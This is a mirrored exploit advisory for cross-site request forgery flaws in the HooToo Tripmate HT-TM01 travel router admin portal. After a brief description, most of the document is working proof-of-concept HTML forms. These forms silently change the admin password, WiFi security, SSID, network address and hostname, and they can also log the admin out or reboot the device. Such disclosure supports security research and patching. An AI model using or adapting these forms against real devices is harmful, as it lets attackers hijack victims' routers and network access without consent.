扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 |
# Exploit Title: HooToo Tripmate HT-TM01 Cross Site Request Forgery # Date: 03Sep15 # Exploit Author: Ken Smith # Contact: https://twitter.com/P4tchw0rk # Vendor Homepage: http://www.hootoo.com # Version: HT-TM01, version 2.000.022 1. Description Various functions in the device's admin web portal are vulnerable to Cross Site Request Forgery. Proof-of-concept HTML has been provided. In order for changes in wireless settings/security (executed via CSRF) to apply, a save and reset must be execute either by the admin manually saving the settings through the portal or via the save and reset CSRF-vulnerable functions described below. 2. Proof of Concept Change the device's hostname <form action=" http://10.10.10.254/protocol.csp?fname=system&opt=host&function=set" method="POST"> <input type="hidden" name="name" value="CSRF123" /> <input type="submit" value="Submit request" /> </form> Change the region <form action=" http://10.10.10.254/protocol.csp?fname=net&opt=wifi_channel_region&function=set" method="POST"> <input type="hidden" name="country" value="England" /> <input type="submit" value="Submit request" /> </form> Log the admin user out <form action="http://10.10.10.254/index.csp?fname=logout" method="POST"> <input type="submit" value="Submit request" /> </form> Change the admin portal password <form action="http://10.10.10.254/protocol.csp?fname=security&function=set" method="POST"> <input type="hidden" name="name" value="admin" /> <input type="hidden" name="opt" value="pwdmod" /> <input type="hidden" name="pwd1" value="newpass" /> <input type="hidden" name="pwd2" value="newpass" /> <input type="submit" value="Submit request" /> </form> Reboot the device <form action="http://10.10.10.254/protocol.csp"> <input type="hidden" name="fname" value="system" /> <input type="hidden" name="opt" value="setting" /> <input type="hidden" name="action" value="reboot" /> <input type="hidden" name="function" value="set" /> <input type="hidden" name="r" value="0.24464550580450606" /> <input type="submit" value="Submit request" /> </form> Save changed settings <form action="http://10.10.10.254/protocol.csp"> <input type="hidden" name="fname" value="storage" /> <input type="hidden" name="opt" value="listen_disk" /> <input type="hidden" name="function" value="get" /> <input type="submit" value="Submit request" /> </form> Change WiFi Security <form action=" http://10.10.10.254/protocol.csp?fname=net&opt=wifi_ap&function=set" method="POST"> <input type="hidden" name="mode" value="4" /> <input type="hidden" name="channel" value="1" /> <input type="hidden" name="security" value="4" /> <input type="hidden" name="hide_ssid" value="0" /> <input type="hidden" name="HTBSSCoexistence" value="0" /> <input type="hidden" name="SSID" value="CSRF" /> <input type="hidden" name="passwd" value="Different-password" /> <input type="submit" value="Submit request" /> </form> Change network information <form action=" http://10.10.10.254/protocol.csp?fname=net&opt=wifi_lan_ip&function=set" method="POST"> <input type="hidden" name="ip" value="10.10.10.123" /> <input type="hidden" name="mask" value="255.255.255.0" /> <input type="submit" value="Submit request" /> </form> |
体验盒子
